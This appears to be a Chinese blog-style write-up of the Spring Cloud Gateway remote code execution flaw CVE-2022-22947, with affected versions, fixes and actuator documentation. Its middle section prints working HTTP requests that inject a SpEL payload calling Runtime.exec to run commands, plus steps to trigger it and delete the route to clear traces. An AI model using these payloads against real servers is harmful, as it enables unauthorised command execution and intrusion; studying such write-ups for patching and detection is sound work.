Spring Cloud Gateway 远程代码执行漏洞（CVE-2022-22947）

梦吟678

5595人浏览 · 2022-06-10 11:04:25

梦吟678 · 2022-06-10 11:04:25 发布

高危

Spring Cloud Gateway 是 Spring Cloud 下的一个项目，该项目是基于 Spring 5.0、Spring Boot 2.0 和 Project Reactor 等技术开发的网关，它旨在为微服务架构提供一种简单有效、统一的 API 路由管理方式。

3 月 1 日，VMware 官方发布安全公告，声明对 Spring Cloud Gateway 中的一处命令注入漏洞进行了修复，漏洞编号为 CVE-2022-22947：

CVE-2022-22947 | Security | VMware Tanzu

漏洞描述

使用 Spring Cloud Gateway 的应用如果对外暴露了 Gateway Actuator 接口，则可能存在被 CVE-2022-22947 漏洞利用的风险。攻击者可通过利用此漏洞执行 SpEL 表达式，从而在目标服务器上执行任意恶意代码，获取系统权限。

影响范围

漏洞利用的前置条件：

除了 Spring Cloud Gateway 外，程序还用到了 Spring Boot Actuator 组件（它用于对外提供 /actuator/ 接口）；
Spring 配置对外暴露 gateway 接口，如 application.properties 配置为：

# 默认为truemanagement.endpoint.gateway.enabled=true
# 以逗号分隔的一系列值，默认为 health# 若包含 gateway 即表示对外提供 Spring Cloud Gateway 接口management.endpoints.web.exposure.include=gateway

漏洞影响的 Spring Cloud Gateway 版本范围：

Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
其他旧的、不受支持的 Spring Cloud Gateway 版本

解决方案

更新升级 Spring Cloud Gateway 到以下安全版本：

Spring Cloud Gateway 3.1.1
Spring Cloud Gateway 3.0.7

或者在不考虑影响业务的情况下禁用 Gateway actuator 接口：如application.properties 中配置 management.endpoint.gateway.enabled 为 false。

产品支持

洞鉴自定义PoC可支持检测，可咨询长亭科技技术支持人员获取解决方案。

示例

抓包

GET / HTTP/1.1
Host: 123.58.236.76:64026
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: think_template=default; PHPSESSID=evrult8mhlb3o6bq7an22fk1kr; _ga=GA1.1.940927922.1654650099; _gid=GA1.1.1263998480.1654650099
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
If-None-Match: "3147526947"
Cache-Control: max-age=0

修改为

构造包含恶意请求的路由，利用burpsuite进行发送

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 123.58.236.76:64026
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 449

{
  "id": "hacktest",
  "filters": [{
               "name": "AddResponseHeader",
                       "args": {
                                "name": "Result",
                                "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
                               }
             }],
  "uri": "http://example.com"
}

返回包

HTTP/1.1 201 Created
Location: /routes/hacktest
content-length: 0
connection: close

然后应用刚添加的路由发送如下数据包，此数据包会触发表达式执行
```
POST /actuator/gateway/refresh HTTP/1.1
```

发送如下数据包可查看结果

GET /actuator/gateway/routes/hacktest HTTP/1.1

最后发送如下数据包进行清理，删除所添加的路由
```
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
```
再次刷新路由
```
POST /actuator/gateway/refresh HTTP/1.1
```

访问actuator API接口

GET /actuator HTTP/1.1
Host: 123.58.236.76:64026
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 454

{
  "id": "hacktest",
  "filters": [{
               "name": "AddResponseHeader",
                       "args": {
                                "name": "Result",
                                "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"ls /tmp\"}).getInputStream()))}"
                               }
             }],
  "uri": "http://example.com"
}

注意

GET /actuator HTTP/1.1

{\"ls /tmp\"}

访问env接口

GET /actuator/env HTTP/1.1
Host: 123.58.236.76:64026
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 454

{
  "id": "hacktest",
  "filters": [{
               "name": "AddResponseHeader",
                       "args": {
                                "name": "Result",
                                "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"ls /tmp\"}).getInputStream()))}"
                               }
             }],
  "uri": "http://example.com"
}

利用思路

确认Spring Cloud Gateway 是否打开actuator gateway
若打开，在/actuator/gateway/routes/pentest添加恶意路由
刷新路由，使恶意路由呈现
触发恶意路由，完成命令执行

如示例所示，在完成添加恶意路由后进行删除恶意路由

首先，可以不进行删除，以上四条为完整思路，测试过并无问题

个人认为，删除是为了清除入侵痕迹，但不明白删除后并刷新，为什么还能继续使用恶意路由，这点还有待思索，期望大佬能解答

关于actuator gateway

参考：Spring Cloud Gateway使用说明（7）-- actuator_xiegwei的博客-CSDN博客_actuator gateway

Spring Cloud Gateway添加了一个全新的、更加详细的格式接口。它添加关于每个路由更多的详细信息，让你可以查看详细的断言、过滤器和其它配置。

下面例子配置/actuator/gateway/routes：

[
  {
    "predicate": "(Hosts: [**.addrequestheader.org] && Paths: [/headers], match trailing slash: true)",
    "route_id": "add_request_header_test",
    "filters": [
      "[[AddResponseHeader X-Response-Default-Foo = 'Default-Bar'], order = 1]",
      "[[AddRequestHeader X-Request-Foo = 'Bar'], order = 1]",
      "[[PrefixPath prefix = '/httpbin'], order = 2]"
    ],
    "uri": "lb://testservice",
    "order": 0
  }
]

同时，这个特性默认是开启的

如果要关闭，如下： Example 73. application.properties

spring.cloud.gateway.actuator.verbose.enabled=false

创建和删除路由

要创建一个路由，发送POST请求 /gateway/routes/{id_route_to_create}，参数为JSON结构，具体参数数据结构参考上面章节。

要删除一个路由，发送 DELETE请求 /gateway/routes/{id_route_to_delete}

刷新路由缓存

如果要清理路由的缓存，请POST请求/actuator/gateway/refresh。该请求将返回一个没有body的200返回码。

查找特定路由

要获取单个路由的信息，发送GET请求 /actuator/gateway/routes/{id} (如： /actuator/gateway/routes/first_route)，返回结果如下所示：

{
  "id": "first_route",
  "predicates": [{
    "name": "Path",
    "args": {"_genkey_0":"/first"}
  }],
  "filters": [],
  "uri": "https://www.uri-destination.org",
  "order": 0
}]

Path	Type	Description
id	String	路由id
predicates	Array	断言,包括名字和参数
filters	Array	路由过滤器
uri	String	目标URI
order	Number	顺序，值越低，优先级越高。

修复建议

参考漏洞影响范围进行排查，官方已针对此漏洞发布修复补丁，请受影响的用户尽快修复。

官方链接：GH-835 Fix RoutingFunction SpEL evaluation · spring-cloud/spring-cloud-function@0e89ee2 · GitHub

向您推荐>>Eolink开发者社区

权威｜前沿｜技术｜干货｜国内首个API全生命周期开发者社区

更多推荐

深入理解 Mocha 测试框架：从零实现一个 Mocha

前言什么是自动化测试自动化测试在很多团队中都是Devops环节中很难执行起来的一个环节，主要原因在于测试代码的编写工作很难抽象，99%的场景都需要和业务强绑定，而且写测试代码的编写工作量往往比编写实际业务代码的工作量更多。在一些很多业务场景中投入产出比很低，适合写自动化测试的应该是那些中长期业务以及一些诸如组件一样的基础库。自动化测试是个比较大的概念，其中分类也比较多，比如单元测试，端对端测试，集

云原生

ELK实现containerd的容器日志采集展示【基于logging的全栈监测】

企业级ELK Stack构建介绍

云原生

(20200916 Solved)docker-compose up创建容器自动退出

问题描述如题，创建容器后自动退出了。并且docker start container无效解决方案原因是缺失了控制终端的配置，需要在docker-compose.yml中增加tty:true ，有时候这样也不行，需要再增加一个command:/bin/bash，命令不一定是这个，需要是一个不会退出的命令，然后用-d后台启动容器。Referencesdocker-compose启动容器后自动退出...